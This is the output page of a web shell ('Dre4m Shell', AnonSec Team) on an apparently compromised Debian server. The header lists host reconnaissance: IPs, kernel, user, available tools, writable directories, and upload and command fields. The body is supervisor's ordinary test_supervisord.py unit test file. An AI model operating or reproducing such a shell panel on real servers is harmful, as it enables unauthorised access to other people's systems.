Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.142.251.204
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/2/root/proc/3/cwd/lib/python3/dist-packages/supervisor/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/2/root/proc/3/cwd/lib/python3/dist-packages/supervisor/tests/test_supervisord.py
import unittest
import time
import signal
import sys
import os
import tempfile
import shutil

from supervisor.states import ProcessStates
from supervisor.states import SupervisorStates

from supervisor.tests.base import DummyOptions
from supervisor.tests.base import DummyPConfig
from supervisor.tests.base import DummyPGroupConfig
from supervisor.tests.base import DummyProcess
from supervisor.tests.base import DummyProcessGroup
from supervisor.tests.base import DummyDispatcher

from supervisor.compat import StringIO

try:
    import pstats
except ImportError: # pragma: no cover
    # Debian-packaged pythons may not have the pstats module
    # unless the "python-profiler" package is installed.
    pstats = None

class EntryPointTests(unittest.TestCase):
    def test_main_noprofile(self):
        from supervisor.supervisord import main
        conf = os.path.join(
            os.path.abspath(os.path.dirname(__file__)), 'fixtures',
            'donothing.conf')
        new_stdout = StringIO()
        new_stdout.fileno = lambda: 1
        old_stdout = sys.stdout
        try:
            tempdir = tempfile.mkdtemp()
            log = os.path.join(tempdir, 'log')
            pid = os.path.join(tempdir, 'pid')
            sys.stdout = new_stdout
            main(args=['-c', conf, '-l', log, '-j', pid, '-n'],
                 test=True)
        finally:
            sys.stdout = old_stdout
            shutil.rmtree(tempdir)
        output = new_stdout.getvalue()
        self.assertTrue('supervisord started' in output, output)

    if pstats:
        def test_main_profile(self):
            from supervisor.supervisord import main
            conf = os.path.join(
                os.path.abspath(os.path.dirname(__file__)), 'fixtures',
                'donothing.conf')
            new_stdout = StringIO()
            new_stdout.fileno = lambda: 1
            old_stdout = sys.stdout
            try:
                tempdir = tempfile.mkdtemp()
                log = os.path.join(tempdir, 'log')
                pid = os.path.join(tempdir, 'pid')
                sys.stdout = new_stdout
                main(args=['-c', conf, '-l', log, '-j', pid, '-n',
                           '--profile_options=cumulative,calls'], test=True)
            finally:
                sys.stdout = old_stdout
                shutil.rmtree(tempdir)
            output = new_stdout.getvalue()
            self.assertTrue('cumulative time, call count' in output, output)

    def test_silent_off(self):
        from supervisor.supervisord import main
        conf = os.path.join(
            os.path.abspath(os.path.dirname(__file__)), 'fixtures',
            'donothing.conf')
        new_stdout = StringIO()
        new_stdout.fileno = lambda: 1
        old_stdout = sys.stdout

        try:
            tempdir = tempfile.mkdtemp()
            log = os.path.join(tempdir, 'log')
            pid = os.path.join(tempdir, 'pid')
            sys.stdout = new_stdout
            main(args=['-c', conf, '-l', log, '-j', pid, '-n'], test=True)
        finally:
            sys.stdout = old_stdout
            shutil.rmtree(tempdir)
        output = new_stdout.getvalue()
        self.assertGreater(len(output), 0)

    def test_silent_on(self):
        from supervisor.supervisord import main
        conf = os.path.join(
            os.path.abspath(os.path.dirname(__file__)), 'fixtures',
            'donothing.conf')
        new_stdout = StringIO()
        new_stdout.fileno = lambda: 1
        old_stdout = sys.stdout

        try:
            tempdir = tempfile.mkdtemp()
            log = os.path.join(tempdir, 'log')
            pid = os.path.join(tempdir, 'pid')
            sys.stdout = new_stdout
            main(args=['-c', conf, '-l', log, '-j', pid, '-n', '-s'], test=True)
        finally:
            sys.stdout = old_stdout
            shutil.rmtree(tempdir)
        output = new_stdout.getvalue()
        self.assertEqual(len(output), 0)

class SupervisordTests(unittest.TestCase):
    def tearDown(self):
        from supervisor.events import clear
        clear()

    def _getTargetClass(self):
        from supervisor.supervisord import Supervisor
        return Supervisor

    def _makeOne(self, options):
        return self._getTargetClass()(options)

    def test_main_first(self):
        options = DummyOptions()
        pconfig = DummyPConfig(options, 'foo', '/bin/foo', '/tmp')
        gconfigs = [DummyPGroupConfig(options, 'foo', pconfigs=[pconfig])]
        options.process_group_configs = gconfigs
        options.test = True
        options.first = True
        supervisord = self._makeOne(options)
        supervisord.main()
        self.assertEqual(options.fds_cleaned_up, False)
        self.assertEqual(options.rlimits_set, True)
        self.assertEqual(options.parse_criticals, ['setuid_called'])
        self.assertEqual(options.parse_warnings, [])
        self.assertEqual(options.parse_infos, ['rlimits_set'])
        self.assertEqual(options.autochildlogdir_cleared, True)
        self.assertEqual(len(supervisord.process_groups), 1)
        self.assertEqual(supervisord.process_groups['foo'].config.options,
                         options)
        self.assertEqual(options.httpservers_opened, True)
        self.assertEqual(options.signals_set, True)
        self.assertEqual(options.daemonized, True)
        self.assertEqual(options.pidfile_written, True)
        self.assertEqual(options.cleaned_up, True)

    def test_main_notfirst(self):
        options = DummyOptions()
        pconfig = DummyPConfig(options, 'foo', '/bin/foo', '/tmp')
        gconfigs = [DummyPGroupConfig(options, 'foo', pconfigs=[pconfig])]
        options.process_group_configs = gconfigs
        options.test = True
        options.first = False
        supervisord = self._makeOne(options)
        supervisord.main()
        self.assertEqual(options.fds_cleaned_up, True)
        self.assertFalse(hasattr(options, 'rlimits_set'))
        self.assertEqual(options.parse_criticals, ['setuid_called'])
        self.assertEqual(options.parse_warnings, [])
        self.assertEqual(options.parse_infos, [])
        self.assertEqual(options.autochildlogdir_cleared, True)
        self.assertEqual(len(supervisord.process_groups), 1)
        self.assertEqual(supervisord.process_groups['foo'].config.options,
                         options)
        self.assertEqual(options.httpservers_opened, True)
        self.assertEqual(options.signals_set, True)
        self.assertEqual(options.daemonized, False)
        self.assertEqual(options.pidfile_written, True)
        self.assertEqual(options.cleaned_up, True)

    def test_reap(self):
        options = DummyOptions()
        options.waitpid_return = 1, 1
        pconfig = DummyPConfig(options, 'process', '/bin/foo', '/tmp')
        process = DummyProcess(pconfig)
        process.drained = False
        process.killing = True
        process.laststop = None
        process.waitstatus = None, None
        options.pidhistory = {1:process}
        supervisord = self._makeOne(options)

        supervisord.reap(once=True)
        self.assertEqual(process.finished, (1,1))

    def test_reap_recursionguard(self):
        options = DummyOptions()
        supervisord = self._makeOne(options)
        result = supervisord.reap(once=True, recursionguard=100)
        self.assertEqual(result, None)

    def test_reap_more_than_once(self):
        options = DummyOptions()
        options.waitpid_return = 1, 1
        pconfig = DummyPConfig(options, 'process', '/bin/foo', '/tmp')
        process = DummyProcess(pconfig)
        process.drained = False
        process.killing = True
        process.laststop = None
        process.waitstatus = None, None
        options.pidhistory = {1:process}
        supervisord = self._makeOne(options)

        supervisord.reap(recursionguard=99)
        self.assertEqual(process.finished, (1,1))

    def test_reap_unknown_pid(self):
        options = DummyOptions()
        options.waitpid_return = 2, 0 # pid, status
        pconfig = DummyPConfig(options, 'process', '/bin/foo', '/tmp')
        process = DummyProcess(pconfig)
        process.drained = False
        process.killing = True
        process.laststop = None
        process.waitstatus = None, None
        options.pidhistory = {1: process}
        supervisord = self._makeOne(options)

        supervisord.reap(once=True)
        self.assertEqual(process.finished, None)
        self.assertEqual(options.logger.data[0],
                         'reaped unknown pid 2 (exit status 0)')

    def test_handle_sigterm(self):
        options = DummyOptions()
        options._signal = signal.SIGTERM
        supervisord = self._makeOne(options)
        supervisord.handle_signal()
        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.SHUTDOWN)
        self.assertEqual(options.logger.data[0],
                         'received SIGTERM indicating exit request')

    def test_handle_sigint(self):
        options = DummyOptions()
        options._signal = signal.SIGINT
        supervisord = self._makeOne(options)
        supervisord.handle_signal()
        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.SHUTDOWN)
        self.assertEqual(options.logger.data[0],
                         'received SIGINT indicating exit request')

    def test_handle_sigquit(self):
        options = DummyOptions()
        options._signal = signal.SIGQUIT
        supervisord = self._makeOne(options)
        supervisord.handle_signal()
        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.SHUTDOWN)
        self.assertEqual(options.logger.data[0],
                         'received SIGQUIT indicating exit request')

    def test_handle_sighup_in_running_state(self):
        options = DummyOptions()
        options._signal = signal.SIGHUP
        supervisord = self._makeOne(options)
        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.RUNNING)
        supervisord.handle_signal()
        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.RESTARTING)
        self.assertEqual(options.logger.data[0],
                         'received SIGHUP indicating restart request')

    def test_handle_sighup_in_shutdown_state(self):
        options = DummyOptions()
        options._signal = signal.SIGHUP
        supervisord = self._makeOne(options)
        supervisord.options.mood = SupervisorStates.SHUTDOWN
        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.SHUTDOWN)
        supervisord.handle_signal()
        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.SHUTDOWN) # unchanged
        self.assertEqual(options.logger.data[0],
                         'ignored SIGHUP indicating restart request '
                         '(shutdown in progress)')

    def test_handle_sigchld(self):
        options = DummyOptions()
        options._signal = signal.SIGCHLD
        supervisord = self._makeOne(options)
        supervisord.handle_signal()
        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.RUNNING)
        # supervisor.options.signame(signal.SIGCHLD) may return "SIGCLD"
        # on linux or other systems where SIGCHLD = SIGCLD.
        msgs = ('received SIGCHLD indicating a child quit',
                'received SIGCLD indicating a child quit')
        self.assertTrue(options.logger.data[0] in msgs)

    def test_handle_sigusr2(self):
        options = DummyOptions()
        options._signal = signal.SIGUSR2
        pconfig1 = DummyPConfig(options, 'process1', '/bin/foo', '/tmp')
        process1 = DummyProcess(pconfig1, state=ProcessStates.STOPPING)
        process1.delay = time.time() - 1
        supervisord = self._makeOne(options)
        pconfigs = [DummyPConfig(options, 'foo', '/bin/foo', '/tmp')]
        options.process_group_configs = DummyPGroupConfig(
            options, 'foo',
            pconfigs=pconfigs)
        dummypgroup = DummyProcessGroup(options)
        supervisord.process_groups = {None:dummypgroup}
        supervisord.handle_signal()
        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.RUNNING)
        self.assertEqual(options.logs_reopened, True)
        self.assertEqual(options.logger.data[0],
                         'received SIGUSR2 indicating log reopen request')
        self.assertEqual(dummypgroup.logs_reopened, True)

    def test_handle_unknown_signal(self):
        options = DummyOptions()
        options._signal = signal.SIGUSR1
        supervisord = self._makeOne(options)
        supervisord.handle_signal()
        self.assertEqual(supervisord.options.mood,
                         SupervisorStates.RUNNING)
        self.assertEqual(options.logger.data[0],
                         'received SIGUSR1 indicating nothing')

    def test_get_state(self):
        options = DummyOptions()
        supervisord = self._makeOne(options)
        self.assertEqual(supervisord.get_state(), SupervisorStates.RUNNING)

    def test_diff_to_active_finds_groups_added(self):
        options = DummyOptions()
        supervisord = self._makeOne(options)

        pconfig = DummyPConfig(options, 'process1', '/bin/foo', '/tmp')
        group1 = DummyPGroupConfig(options, 'group1', pconfigs=[pconfig])

        # the active configuration has no groups
        # diffing should find that group1 has been added
        supervisord.options.process_group_configs = [group1]
        added, changed, removed = supervisord.diff_to_active()
        self.assertEqual(added, [group1])
        self.assertEqual(changed, [])
        self.assertEqual(removed, [])

    def test_diff_to_active_finds_groups_removed(self):
        options = DummyOptions()
        supervisord = self._makeOne(options)

        pconfig = DummyPConfig(options, 'process1', '/bin/process1', '/tmp')
        group1 = DummyPGroupConfig(options, 'group1', pconfigs=[pconfig])

        pconfig = DummyPConfig(options, 'process2', '/bin/process2', '/tmp')
        group2 = DummyPGroupConfig(options, 'group2', pconfigs=[pconfig])

        # set up supervisord with an active configuration of group1 and group2
        supervisord.options.process_group_configs = [group1, group2]
        supervisord.add_process_group(group1)
        supervisord.add_process_group(group2)

        # diffing should find that group2 has been removed
        supervisord.options.process_group_configs = [group1]
        added, changed, removed = supervisord.diff_to_active()
        self.assertEqual(added, [])
        self.assertEqual(changed, [])
        self.assertEqual(removed, [group2])

    def test_diff_to_active_changed(self):
        from supervisor.options import ProcessConfig, ProcessGroupConfig

        options = DummyOptions()
        supervisord = self._makeOne(options)

        def make_pconfig(name, command, **params):
            result = {
                'name': name, 'command': command,
                'directory': None, 'umask': None, 'priority': 999, 'autostart': True,
                'autorestart': True, 'startsecs': 10, 'startretries': 999,
                'uid': None, 'stdout_logfile': None, 'stdout_capture_maxbytes': 0,
                'stdout_events_enabled': False,
                'stdout_logfile_backups': 0, 'stdout_logfile_maxbytes': 0,
                'stdout_syslog': False,
                'stderr_logfile': None, 'stderr_capture_maxbytes': 0,
                'stderr_events_enabled': False,
                'stderr_logfile_backups': 0, 'stderr_logfile_maxbytes': 0,
                'stderr_syslog': False,
                'redirect_stderr': False,
                'stopsignal': None, 'stopwaitsecs': 10,
                'stopasgroup': False,
                'killasgroup': False,
                'exitcodes': (0,), 'environment': None, 'serverurl': None,
            }
            result.update(params)
            return ProcessConfig(options, **result)

        def make_gconfig(name, pconfigs):
            return ProcessGroupConfig(options, name, 25, pconfigs)

        pconfig = make_pconfig('process1', 'process1', uid='new')
        group1 = make_gconfig('group1', [pconfig])

        pconfig = make_pconfig('process2', 'process2')
        group2 = make_gconfig('group2', [pconfig])
        new = [group1, group2]

        pconfig = make_pconfig('process1', 'process1', uid='old')
        group3 = make_gconfig('group1', [pconfig])

        pconfig = make_pconfig('process2', 'process2')
        group4 = make_gconfig('group2', [pconfig])
        supervisord.add_process_group(group3)
        supervisord.add_process_group(group4)

        supervisord.options.process_group_configs = new
        added, changed, removed = supervisord.diff_to_active()
        self.assertEqual(added, [])
        self.assertEqual(removed, [])
        self.assertEqual(changed, [group1])

        options = DummyOptions()
        supervisord = self._makeOne(options)

        pconfig1 = make_pconfig('process1', 'process1')
        pconfig2 = make_pconfig('process2', 'process2')
        group1 = make_gconfig('group1', [pconfig1, pconfig2])
        new = [group1]

        supervisord.add_process_group(make_gconfig('group1', [pconfig1]))

        supervisord.options.process_group_configs = new
        added, changed, removed = supervisord.diff_to_active()
        self.assertEqual(added, [])
        self.assertEqual(removed, [])
        self.assertEqual(changed, [group1])

    def test_diff_to_active_changed_eventlistener(self):
        from supervisor.events import EventTypes
        from supervisor.options import EventListenerConfig, EventListenerPoolConfig

        options = DummyOptions()
        supervisord = self._makeOne(options)

        def make_pconfig(name, command, **params):
            result = {
                'name': name, 'command': command,
                'directory': None, 'umask': None, 'priority': 999, 'autostart': True,
                'autorestart': True, 'startsecs': 10, 'startretries': 999,
                'uid': None, 'stdout_logfile': None, 'stdout_capture_maxbytes': 0,
                'stdout_events_enabled': False,
                'stdout_logfile_backups': 0, 'stdout_logfile_maxbytes': 0,
                'stdout_syslog': False,
                'stderr_logfile': None, 'stderr_capture_maxbytes': 0,
                'stderr_events_enabled': False,
                'stderr_logfile_backups': 0, 'stderr_logfile_maxbytes': 0,
                'stderr_syslog': False,
                'redirect_stderr': False,
                'stopsignal': None, 'stopwaitsecs': 10,
                'stopasgroup': False,
                'killasgroup': False,
                'exitcodes': (0,), 'environment': None, 'serverurl': None,
            }
            result.update(params)
            return EventListenerConfig(options, **result)

        def make_econfig(*pool_event_names):
            result = []
            for pool_event_name in pool_event_names:
                result.append(getattr(EventTypes, pool_event_name, None))
            return result

        def make_gconfig(name, pconfigs, pool_events, result_handler='supervisor.dispatchers:default_handler'):
            return EventListenerPoolConfig(options, name, 25, pconfigs, 10, pool_events, result_handler)

	    # Test that changing an eventlistener's command is detected by diff_to_active
        pconfig = make_pconfig('process1', 'process1-new')
        econfig = make_econfig("TICK_60")
        group1 = make_gconfig('group1', [pconfig], econfig)

        pconfig = make_pconfig('process2', 'process2')
        econfig = make_econfig("TICK_3600")
        group2 = make_gconfig('group2', [pconfig], econfig)
        new = [group1, group2]

        pconfig = make_pconfig('process1', 'process1-old')
        econfig = make_econfig("TICK_60")
        group3 = make_gconfig('group1', [pconfig], econfig)

        pconfig = make_pconfig('process2', 'process2')
        econfig = make_econfig("TICK_3600")
        group4 = make_gconfig('group2', [pconfig], econfig)
        supervisord.add_process_group(group3)
        supervisord.add_process_group(group4)

        supervisord.options.process_group_configs = new
        added, changed, removed = supervisord.diff_to_active()
        self.assertEqual(added, [])
        self.assertEqual(removed, [])
        self.assertEqual(changed, [group1])

        # Test that changing an eventlistener's event is detected by diff_to_active
        options = DummyOptions()
        supervisord = self._makeOne(options)

        pconfig = make_pconfig('process1', 'process1')
        econfig = make_econfig("TICK_60")
        group1 = make_gconfig('group1', [pconfig], econfig)

        pconfig = make_pconfig('process2', 'process2')
        econfig = make_econfig("TICK_3600")
        group2 = make_gconfig('group2', [pconfig], econfig)
        new = [group1, group2]

        pconfig = make_pconfig('process1', 'process1')
        econfig = make_econfig("TICK_5")
        group3 = make_gconfig('group1', [pconfig], econfig)

        pconfig = make_pconfig('process2', 'process2')
        econfig = make_econfig("TICK_3600")
        group4 = make_gconfig('group2', [pconfig], econfig)
        supervisord.add_process_group(group3)
        supervisord.add_process_group(group4)

        supervisord.options.process_group_configs = new
        added, changed, removed = supervisord.diff_to_active()
        self.assertEqual(added, [])
        self.assertEqual(removed, [])
        self.assertEqual(changed, [group1])

        # Test that changing an eventlistener's result_handler is detected by diff_to_active
        options = DummyOptions()
        supervisord = self._makeOne(options)

        pconfig = make_pconfig('process1', 'process1')
        econfig = make_econfig("TICK_60")
        group1 = make_gconfig('group1', [pconfig], econfig, 'new-result-handler')

        pconfig = make_pconfig('process2', 'process2')
        econfig = make_econfig("TICK_3600")
        group2 = make_gconfig('group2', [pconfig], econfig)
        new = [group1, group2]

        pconfig = make_pconfig('process1', 'process1')
        econfig = make_econfig("TICK_60")
        group3 = make_gconfig('group1', [pconfig], econfig, 'old-result-handler')

        pconfig = make_pconfig('process2', 'process2')
        econfig = make_econfig("TICK_3600")
        group4 = make_gconfig('group2', [pconfig], econfig)
        supervisord.add_process_group(group3)
        supervisord.add_process_group(group4)

        supervisord.options.process_group_configs = new
        added, changed, removed = supervisord.diff_to_active()
        self.assertEqual(added, [])
        self.assertEqual(removed, [])
        self.assertEqual(changed, [group1])

    def test_add_process_group(self):
        options = DummyOptions()
        pconfig = DummyPConfig(options, 'foo', '/bin/foo', '/tmp')
        gconfig = DummyPGroupConfig(options, 'foo', pconfigs=[pconfig])
        options.process_group_configs = [gconfig]
        supervisord = self._makeOne(options)

        self.assertEqual(supervisord.process_groups, {})

        result = supervisord.add_process_group(gconfig)
        self.assertEqual(list(supervisord.process_groups.keys()), ['foo'])
        self.assertTrue(result)

        group = supervisord.process_groups['foo']
        result = supervisord.add_process_group(gconfig)
        self.assertEqual(group, supervisord.process_groups['foo'])
        self.assertTrue(not result)

    def test_add_process_group_emits_event(self):
        from supervisor import events
        L = []
        def callback(event):
            L.append(1)
        events.subscribe(events.ProcessGroupAddedEvent, callback)
        options = DummyOptions()
        pconfig = DummyPConfig(options, 'foo', '/bin/foo', '/tmp')
        gconfig = DummyPGroupConfig(options, 'foo', pconfigs=[pconfig])
        options.process_group_configs = [gconfig]
        supervisord = self._makeOne(options)

        supervisord.add_process_group(gconfig)

        options.test = True
        supervisord.runforever()
        self.assertEqual(L, [1])

    def test_remove_process_group(self):
        options = DummyOptions()
        pconfig = DummyPConfig(options, 'foo', '/bin/foo', '/tmp')
        gconfig = DummyPGroupConfig(options, 'foo', pconfigs=[pconfig])
        supervisord = self._makeOne(options)

        self.assertRaises(KeyError, supervisord.remove_process_group, 'asdf')

        supervisord.add_process_group(gconfig)
        group = supervisord.process_groups['foo']
        result = supervisord.remove_process_group('foo')
        self.assertTrue(group.before_remove_called)
        self.assertEqual(supervisord.process_groups, {})
        self.assertTrue(result)

        supervisord.add_process_group(gconfig)
        supervisord.process_groups['foo'].unstopped_processes = [DummyProcess(None)]
        result = supervisord.remove_process_group('foo')
        self.assertEqual(list(supervisord.process_groups.keys()), ['foo'])
        self.assertTrue(not result)

    def test_remove_process_group_event(self):
        from supervisor import events
        L = []
        def callback(event):
            L.append(1)
        events.subscribe(events.ProcessGroupRemovedEvent, callback)
        options = DummyOptions()
        pconfig = DummyPConfig(options, 'foo', '/bin/foo', '/tmp')
        gconfig = DummyPGroupConfig(options, 'foo', pconfigs=[pconfig])
        options.process_group_configs = [gconfig]
        supervisord = self._makeOne(options)

        supervisord.add_process_group(gconfig)
        supervisord.process_groups['foo'].stopped_processes = [DummyProcess(None)]
        supervisord.remove_process_group('foo')
        options.test = True
        supervisord.runforever()

        self.assertEqual(L, [1])

    def test_runforever_emits_generic_startup_event(self):
        from supervisor import events
        L = []
        def callback(event):
            L.append(1)
        events.subscribe(events.SupervisorStateChangeEvent, callback)
        options = DummyOptions()
        supervisord = self._makeOne(options)
        options.test = True
        supervisord.runforever()
        self.assertEqual(L, [1])

    def test_runforever_emits_generic_specific_event(self):
        from supervisor import events
        L = []
        def callback(event):
            L.append(2)
        events.subscribe(events.SupervisorRunningEvent, callback)
        options = DummyOptions()
        options.test = True
        supervisord = self._makeOne(options)
        supervisord.runforever()
        self.assertEqual(L, [2])

    def test_runforever_calls_tick(self):
        options = DummyOptions()
        options.test = True
        supervisord = self._makeOne(options)
        self.assertEqual(len(supervisord.ticks), 0)
        supervisord.runforever()
        self.assertEqual(len(supervisord.ticks), 3)

    def test_runforever_poll_dispatchers(self):
        options = DummyOptions()
        options.poller.result = [6], [7, 8]
        supervisord = self._makeOne(options)
        pconfig = DummyPConfig(options, 'foo', '/bin/foo',)
        gconfig = DummyPGroupConfig(options, pconfigs=[pconfig])
        pgroup = DummyProcessGroup(gconfig)
        readable = DummyDispatcher(readable=True)
        writable = DummyDispatcher(writable=True)
        error = DummyDispatcher(writable=True, error=OSError)
        pgroup.dispatchers = {6:readable, 7:writable, 8:error}
        supervisord.process_groups = {'foo': pgroup}
        options.test = True
        supervisord.runforever()
        self.assertEqual(pgroup.transitioned, True)
        self.assertEqual(readable.read_event_handled, True)
        self.assertEqual(writable.write_event_handled, True)
        self.assertEqual(error.error_handled, True)

    def test_runforever_select_dispatcher_exitnow_via_read(self):
        options = DummyOptions()
        options.poller.result = [6], []
        supervisord = self._makeOne(options)
        pconfig = DummyPConfig(options, 'foo', '/bin/foo',)
        gconfig = DummyPGroupConfig(options, pconfigs=[pconfig])
        pgroup = DummyProcessGroup(gconfig)
        from supervisor.medusa import asyncore_25 as asyncore
        exitnow = DummyDispatcher(readable=True, error=asyncore.ExitNow)
        pgroup.dispatchers = {6:exitnow}
        supervisord.process_groups = {'foo': pgroup}
        options.test = True
        self.assertRaises(asyncore.ExitNow, supervisord.runforever)

    def test_runforever_select_dispatcher_exitnow_via_write(self):
        options = DummyOptions()
        options.poller.result = [], [6]
        supervisord = self._makeOne(options)
        pconfig = DummyPConfig(options, 'foo', '/bin/foo',)
        gconfig = DummyPGroupConfig(options, pconfigs=[pconfig])
        pgroup = DummyProcessGroup(gconfig)
        from supervisor.medusa import asyncore_25 as asyncore
        exitnow = DummyDispatcher(readable=True, error=asyncore.ExitNow)
        pgroup.dispatchers = {6:exitnow}
        supervisord.process_groups = {'foo': pgroup}
        options.test = True
        self.assertRaises(asyncore.ExitNow, supervisord.runforever)

    def test_runforever_select_dispatcher_handle_error_via_read(self):
        options = DummyOptions()
        options.poller.result = [6], []
        supervisord = self._makeOne(options)
        pconfig = DummyPConfig(options, 'foo', '/bin/foo',)
        gconfig = DummyPGroupConfig(options, pconfigs=[pconfig])
        pgroup = DummyProcessGroup(gconfig)
        notimpl = DummyDispatcher(readable=True, error=NotImplementedError)
        pgroup.dispatchers = {6:notimpl}
        supervisord.process_groups = {'foo': pgroup}
        options.test = True
        supervisord.runforever()
        self.assertEqual(notimpl.error_handled, True)

    def test_runforever_select_dispatcher_handle_error_via_write(self):
        options = DummyOptions()
        options.poller.result = [], [6]
        supervisord = self._makeOne(options)
        pconfig = DummyPConfig(options, 'foo', '/bin/foo',)
        gconfig = DummyPGroupConfig(options, pconfigs=[pconfig])
        pgroup = DummyProcessGroup(gconfig)
        notimpl = DummyDispatcher(readable=True, error=NotImplementedError)
        pgroup.dispatchers = {6:notimpl}
        supervisord.process_groups = {'foo': pgroup}
        options.test = True
        supervisord.runforever()
        self.assertEqual(notimpl.error_handled, True)

    def test_runforever_stopping_emits_events(self):
        options = DummyOptions()
        supervisord = self._makeOne(options)
        gconfig = DummyPGroupConfig(options)
        pgroup = DummyProcessGroup(gconfig)
        supervisord.process_groups = {'foo': pgroup}
        supervisord.options.mood = SupervisorStates.SHUTDOWN
        L = []
        def callback(event):
            L.append(event)
        from supervisor import events
        events.subscribe(events.SupervisorStateChangeEvent, callback)
        from supervisor.medusa import asyncore_25 as asyncore
        options.test = True
        self.assertRaises(asyncore.ExitNow, supervisord.runforever)
        self.assertTrue(pgroup.all_stopped)
        self.assertTrue(isinstance(L[0], events.SupervisorRunningEvent))
        self.assertTrue(isinstance(L[0], events.SupervisorStateChangeEvent))
        self.assertTrue(isinstance(L[1], events.SupervisorStoppingEvent))
        self.assertTrue(isinstance(L[1], events.SupervisorStateChangeEvent))

    def test_exit(self):
        options = DummyOptions()
        supervisord = self._makeOne(options)
        pconfig = DummyPConfig(options, 'foo', '/bin/foo',)
        gconfig = DummyPGroupConfig(options, pconfigs=[pconfig])
        pgroup = DummyProcessGroup(gconfig)
        L = []
        def callback():
            L.append(1)
        supervisord.process_groups = {'foo': pgroup}
        supervisord.options.mood = SupervisorStates.RESTARTING
        supervisord.options.test = True
        from supervisor.medusa import asyncore_25 as asyncore
        self.assertRaises(asyncore.ExitNow, supervisord.runforever)
        self.assertEqual(pgroup.all_stopped, True)

    def test_exit_delayed(self):
        options = DummyOptions()
        supervisord = self._makeOne(options)
        pconfig = DummyPConfig(options, 'foo', '/bin/foo',)
        process = DummyProcess(pconfig)
        gconfig = DummyPGroupConfig(options, pconfigs=[pconfig])
        pgroup = DummyProcessGroup(gconfig)
        pgroup.unstopped_processes = [process]
        L = []
        def callback():
            L.append(1)
        supervisord.process_groups = {'foo': pgroup}
        supervisord.options.mood = SupervisorStates.RESTARTING
        supervisord.options.test = True
        supervisord.runforever()
        self.assertNotEqual(supervisord.lastshutdownreport, 0)

    def test_getSupervisorStateDescription(self):
        from supervisor.states import getSupervisorStateDescription
        result = getSupervisorStateDescription(SupervisorStates.RUNNING)
        self.assertEqual(result, 'RUNNING')

    def test_tick(self):
        from supervisor import events
        L = []
        def callback(event):
            L.append(event)
        events.subscribe(events.TickEvent, callback)
        options = DummyOptions()
        supervisord = self._makeOne(options)

        supervisord.tick(now=0)
        self.assertEqual(supervisord.ticks[5], 0)
        self.assertEqual(supervisord.ticks[60], 0)
        self.assertEqual(supervisord.ticks[3600], 0)
        self.assertEqual(len(L), 0)

        supervisord.tick(now=6)
        self.assertEqual(supervisord.ticks[5], 5)
        self.assertEqual(supervisord.ticks[60], 0)
        self.assertEqual(supervisord.ticks[3600], 0)
        self.assertEqual(len(L), 1)
        self.assertEqual(L[-1].__class__, events.Tick5Event)

        supervisord.tick(now=61)
        self.assertEqual(supervisord.ticks[5], 60)
        self.assertEqual(supervisord.ticks[60], 60)
        self.assertEqual(supervisord.ticks[3600], 0)
        self.assertEqual(len(L), 3)
        self.assertEqual(L[-1].__class__, events.Tick60Event)

        supervisord.tick(now=3601)
        self.assertEqual(supervisord.ticks[5], 3600)
        self.assertEqual(supervisord.ticks[60], 3600)
        self.assertEqual(supervisord.ticks[3600], 3600)
        self.assertEqual(len(L), 6)
        self.assertEqual(L[-1].__class__, events.Tick3600Event)

def test_suite():
    return unittest.findTestCases(sys.modules[__name__])

if __name__ == '__main__':
    unittest.main(defaultTest='test_suite')


Anon7 - 2022
AnonSec Team